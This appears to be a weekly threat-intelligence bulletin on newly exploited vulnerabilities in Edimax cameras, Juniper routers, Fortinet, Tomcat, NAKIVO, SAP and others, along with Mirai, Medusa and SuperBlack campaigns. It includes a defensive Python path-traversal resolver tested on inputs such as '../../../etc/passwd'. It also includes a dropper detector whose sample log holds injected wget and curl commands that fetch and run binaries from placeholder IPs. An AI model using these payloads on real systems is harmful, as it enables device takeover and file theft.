Executive Summary
This week, the cybersecurity landscape witnessed a surge in exploitations and malicious activities, emphasizing the growing risks posed by unpatched vulnerabilities and sophisticated cyber threats. The Cybersecurity and Infrastructure Security Agency (CISA) added seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, impacting major vendors such as Apple, Fortinet, Edimax, NAKIVO, Juniper, SAP, and tj-actions. Apart from this, an actively exploited vulnerability in Apache Tomcat underscores the urgency for organizations to implement timely security patches.
Botnet activity spiked significantly, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeting vulnerabilities in Spring Cloud Gateway, GitLab, and PHP, while Bashlite, BrickerBot, Tsunami, and Mirai escalated their attacks on Eir D1000 modems, reinforcing the persistent threats faced by IoT devices.
Security researchers have identified multiple cyber threats targeting enterprises and critical infrastructure. Akamai’s SIRT reported ongoing exploitation of a command injection vulnerability in Edimax IC-7100 cameras to deploy Mirai botnet variants. Mandiant linked China-backed UNC3886 to custom backdoors in Juniper Networks’ Junos OS routers, while Forescout uncovered Russian group Mora_001 exploiting FortiOS and FortiProxy vulnerabilities to deploy SuperBlack ransomware. Armis Labs analyzed Medusa ransomware, integrating intelligence from FBI, CISA, and MS-ISAC.
Additionally, ReliaQuest highlighted continued exploitation of Fortinet VPN vulnerabilities for large-scale credential theft and administrative control. These findings underscore the urgent need for proactive security measures, patch management, and strengthened defenses against evolving cyber threats.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
An OS Command Injection Vulnerability in the Edimax IC-7100 network camera allows attackers to achieve remote code execution on vulnerable devices through specially crafted requests. Rated critical with a CVSS score of 9.8, this flaw affects all versions of the device. Additionally, the impacted products have reached End-of-Life (EoL) and End-of-Support (EoS) status, meaning they will no longer receive security updates, leaving them permanently vulnerable. Given the active exploitation risk, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
An Improper Isolation or Compartmentalization Vulnerability in Juniper Networks Junos OS allowed local attackers with shell access to execute arbitrary code, posing a significant security risk. Juniper Networks has released patches for this flaw in multiple versions, including 21.2R3-S9, 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 23.4R2-S4, 24.2R1-S2, and the latest releases 24.2R2 and 24.4R1. A high-privilege local attacker could leverage this vulnerability to inject malicious code, potentially compromising affected devices. The company's Security Incident Response Team (SIRT) confirmed at least one instance of malicious exploitation, leading to its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog.
An Out-of-Bounds Write Vulnerability in the WebKit browser engine could allow remote attackers to craft malicious web content that escapes the Web Content sandbox, potentially leading to arbitrary code execution or full system compromise. Apple has confirmed that this zero-day vulnerability has been actively exploited in the wild through highly sophisticated attacks, underscoring its critical severity. In response, Apple has released security updates for visionOS 2.3.2, iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, and Safari 18.3.1, urging users to apply patches immediately. Given the active exploitation, this vulnerability has also been added to the CISA KEV catalog, further reinforcing the urgency of remediation.
An Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy allows remote attackers to gain super-administrator privileges through an alternate path or channel. Assigned a high CVSS Score of 8.1, this flaw affects FortiOS versions 7.0.0 through 7.0.16 and FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12. Fortinet has released security patches to address this vulnerability, urging organizations to apply updates promptly to mitigate potential exploitation. Given the severity of the flaw, it has also been added to the CISA KEV Catalog, signaling an increased risk of active attacks.
A Remote Code Execution Vulnerability in Apache Tomcat poses a severe risk, allowing attackers to take control of affected servers using a simple PUT request. Rated critical with a CVSS score of 9.8, this flaw has been actively exploited in the wild, especially after a public proof-of-concept (PoC) was released just 30 hours after disclosure. Apache has addressed this issue in versions 9.0.99, 10.1.35, and 11.0.3, urging organizations to update immediately to mitigate potential threats.
A Malicious Code Injection Vulnerability has been identified in the tj-actions/changed-files GitHub Action, potentially exposing sensitive information through action logs. Rated high with a CVSS score of 8.6, this vulnerability could enable remote attackers to gain unauthorized access. Developers and organizations using this GitHub Action should immediately update to version 46.0.1 to protect their workflows. The vulnerability has been added to the CISA KEV catalog, acknowledging active exploitation in the wild.
An Absolute Path Traversal Vulnerability in NAKIVO Backup and Replication allows attackers to read arbitrary files from the system, potentially exposing sensitive data. Rated high with a CVSS score of 8.6, the flaw was discovered by a watchTowr security researcher in version 10.11.3.86570, though earlier versions remain unverified. The vulnerability resides in the Director component, which serves as NAKIVO's central management HTTP interface. While NAKIVO has silently patched the issue in version 11.0.0.88174, the risk remains for unpatched deployments. Due to its potential for exploitation, this vulnerability has been added to the CISA KEV catalog, urging organizations to update immediately to mitigate threats.
A Directory Traversal Vulnerability in the SAP NetWeaver Application Server (AS) allows remote attackers to read arbitrary files by leveraging a ".." (dot-dot) sequence in the query string. With a CVSS score of 7.5 (High), this flaw has been actively exploited since at least August 2017, demonstrating its long-standing risk. Despite being eight years old, it continues to pose a security threat to unpatched systems. Recognizing its exploitation in the wild, CISA has recently added this vulnerability to its KEV catalog, urging organizations to assess their SAP deployments.
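The NAKIVO absolute-path traversal and the SAP dot-dot traversal described above are two faces of the same server-side mistake: a client-supplied path is joined to a base directory and trusted. The following Python is an added illustration and is not part of this report or of either vendor's code; it places the vulnerable join beside a hardened resolver. The document root and the sample request paths are constructed for the example, and no files are actually read.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root used for the example; nothing is read from disk.
BASE = "/srv/app/public"


def resolve_unsafe(base, user_path):
    """Vulnerable pattern: trusts the client-supplied path.

    posixpath.join discards `base` entirely when user_path is absolute
    (the NAKIVO-style case), and '..' components climb out of the root
    after normalization (the SAP-style case).
    """
    return posixpath.normpath(posixpath.join(base, user_path))


def resolve_safe(base, user_path):
    """Hardened resolver: decode once, reject absolute paths and null bytes,
    normalize, then require the result to remain under `base`."""
    decoded = unquote(user_path)          # handle %2e%2e style encodings
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    if posixpath.isabs(decoded):
        raise ValueError("absolute path rejected")
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    # commonpath is the containment check; a prefix string compare would
    # wrongly accept "/srv/app/public2/.." style siblings.
    if posixpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes document root")
    return candidate


def triage(base, requested_paths):
    """Return (path, unsafe_result, safe_verdict) for each request, so the
    two resolvers can be compared side by side on the same inputs."""
    rows = []
    for p in requested_paths:
        try:
            verdict = resolve_safe(base, p)
        except ValueError as exc:
            verdict = f"REJECTED: {exc}"
        rows.append((p, resolve_unsafe(base, p), verdict))
    return rows


if __name__ == "__main__":
    # Constructed sample requests: two legitimate, four traversal attempts.
    samples = [
        "css/site.css",
        "a/../b.txt",
        "/etc/passwd",
        "../../../etc/passwd",
        "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
        "a%00.txt",
    ]
    for row in triage(BASE, samples):
        print(row)
```

The unsafe resolver returns `/etc/passwd` for both the absolute and the dot-dot inputs; the hardened one returns a path under the document root for the legitimate requests and raises for everything else.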
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented below are the top 5 CVEs with payloads suggestive of botnet activity, such as invoking wget with bare IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
Akamai's Security Intelligence Response Team (SIRT) has identified an ongoing exploitation of a command injection vulnerability in Edimax IC-7100 network cameras, which threat actors have been leveraging since at least May 2024 to deploy Mirai botnet variants. Researchers have observed at least two distinct Mirai variants, one of which includes anti-debugging capabilities before executing a shell script that retrieves the malware for multiple architectures. The ultimate objective of these campaigns is to assemble a botnet of compromised devices to launch distributed denial-of-service (DDoS) attacks using TCP and UDP protocols. Upon successfully gaining access, attackers execute a remote command injection exploit, triggering a shell script that downloads the Mirai malware payload from a remote server, further expanding their botnet infrastructure.
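The botnet indicator used in the sensor section above (a payload that fetches a stage with wget from a bare IP address) and the Edimax/Mirai chain just described (command injection, then a shell script that downloads the payload from a remote server) can be turned into a simple triage rule over request logs. The Python below is an added example, not Loginsoft's or Akamai's code; the log format and the log lines are constructed for the example, using RFC 5737 documentation addresses rather than real infrastructure.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample sensor log, one request per line: "src_ip method path_and_query".
# Addresses are RFC 5737 documentation ranges, not real indicators.
SAMPLE_LOG = """\
198.51.100.7 POST /cgi-bin/admin.cgi?cmd=;wget%20http://203.0.113.9/bins/x.arm;chmod%20777%20x.arm;./x.arm
198.51.100.7 GET /index.html
192.0.2.44 GET /api/v1/status?format=json
192.0.2.90 POST /upload.php?f=$(curl%20-O%20http://203.0.113.21/x86)
192.0.2.12 GET /docs?url=https://example.com/page
"""

# Botnet droppers usually pull the next stage from an IPv4 literal rather than a
# hostname, so "fetch tool ... IP" within a single shell command is the signal.
FETCH_FROM_IP = re.compile(
    r"\b(wget|curl|tftp)\b[^;|&`]{0,80}?(\d{1,3}(?:\.\d{1,3}){3})"
)
# Shell metacharacters that chain the fetch onto the injected command.
SHELL_CHAIN = re.compile(r"[;|&]|\$\(|`")


def classify(line):
    """Return a dict describing why a request looks like a botnet dropper, or None."""
    parts = line.split(maxsplit=2)
    if len(parts) < 3:
        return None
    src_ip, method, target = parts
    decoded = unquote_plus(target)       # payloads arrive URL-encoded
    m = FETCH_FROM_IP.search(decoded)
    if not m:
        return None
    return {
        "src": src_ip,
        "method": method,
        "tool": m.group(1),
        "stage_host": m.group(2),        # where the malware stage is fetched from
        "shell_chain": bool(SHELL_CHAIN.search(decoded)),
    }


def scan(log_text):
    """Run classify() over every non-empty log line and keep the hits."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            hit = classify(line)
            if hit:
                hits.append(hit)
    return hits


def stage_hosts(hits):
    """Distinct download hosts seen across hits, for blocklisting or pivoting."""
    return sorted({h["stage_host"] for h in hits})


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print("stage hosts:", stage_hosts(scan(SAMPLE_LOG)))
```

On the constructed log, two of the five requests are flagged; the benign `url=https://example.com/page` request is not, because it carries neither a fetch tool nor an IP literal. The `stage_host` values are what a defender would feed to egress blocking and to a lookup of which other sensors saw the same download server.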
In mid-2024, Mandiant uncovered that UNC3886, a China-linked espionage group, had deployed custom backdoors on Juniper Networks Junos OS routers. These TinyShell-based backdoors exhibited varied capabilities, including active and passive access, along with an embedded script designed to disable logging mechanisms on compromised devices. Further investigation revealed that UNC3886 bypassed security protections by injecting malicious code into the memory of legitimate processes, a technique now tracked as CVE-2025-21590.
Forescout researchers have identified Mora_001, a Russian hacking group, actively exploiting FortiOS and FortiProxy vulnerabilities to compromise Fortinet products. The group is suspected of utilizing the LockBit builder to develop its own ransomware variant, dubbed SuperBlack. Mora_001 strategically focuses on high-value assets, such as servers and domain controllers, employing WMIC for system discovery and SSH for lateral movement. True to modern ransomware tactics, the group ensures data exfiltration is completed before deploying the ransomware, maximizing its leverage over victims.
Medusa Ransomware: Exploiting Public-Facing Vulnerabilities for Initial Access
Armis Labs has released a detailed analysis of Medusa ransomware, integrating intelligence from multiple sources, including FBI, CISA, and MS-ISAC. The report outlines Medusa's tactics, techniques, and procedures, indicators of compromise, and mitigation strategies to help organizations defend against this evolving threat. One of Medusa's primary attack vectors involves the exploitation of public-facing applications by targeting unpatched vulnerabilities in internet-facing systems. Notably, the ransomware has been observed exploiting Microsoft Exchange Server vulnerabilities (ProxyShell, CVE-2021-34473), an authentication bypass flaw in ScreenConnect (CVE-2024-1709), and a SQL injection vulnerability in Fortinet EMS (CVE-2023-48788). These exploits allow attackers to gain initial access, deploy ransomware, and disrupt critical operations, reinforcing the need for timely patching and proactive defense measures.
Persistent Exploitation of Fortinet VPN Vulnerabilities by Cybercriminals and APT Groups
Recent investigations from ReliaQuest highlight that Fortinet VPN-related vulnerabilities, such as CVE-2022-40684 and CVE-2018-13379, continue to be exploited by threat actors for large-scale credential theft and administrative control. Despite being disclosed years ago, these vulnerabilities remain integral to cybercriminal and nation-state attack strategies. CVE-2022-40684 was notably leveraged in 2025 by the Belsen_Group gang, granting attackers super-admin privileges over VPN infrastructure and enabling highly automated attacks. Meanwhile, CVE-2018-13379 has been actively exploited by state-sponsored APT groups such as Russia-backed APT28 and Iran-backed MuddyWater, allowing them to maintain persistent access to compromised networks for prolonged espionage and operational disruption.
PRE-NVD observed for this week
This section covers vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/03/19/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/03/18/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.reliaquest.com/blog/credential-theft-vs-admin-control-threat-spotlight/
- https://www.armis.com/blog/breaking-down-medusa-ransomware/
- https://www.cisa.gov/news-events/alerts/2025/03/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/
- https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers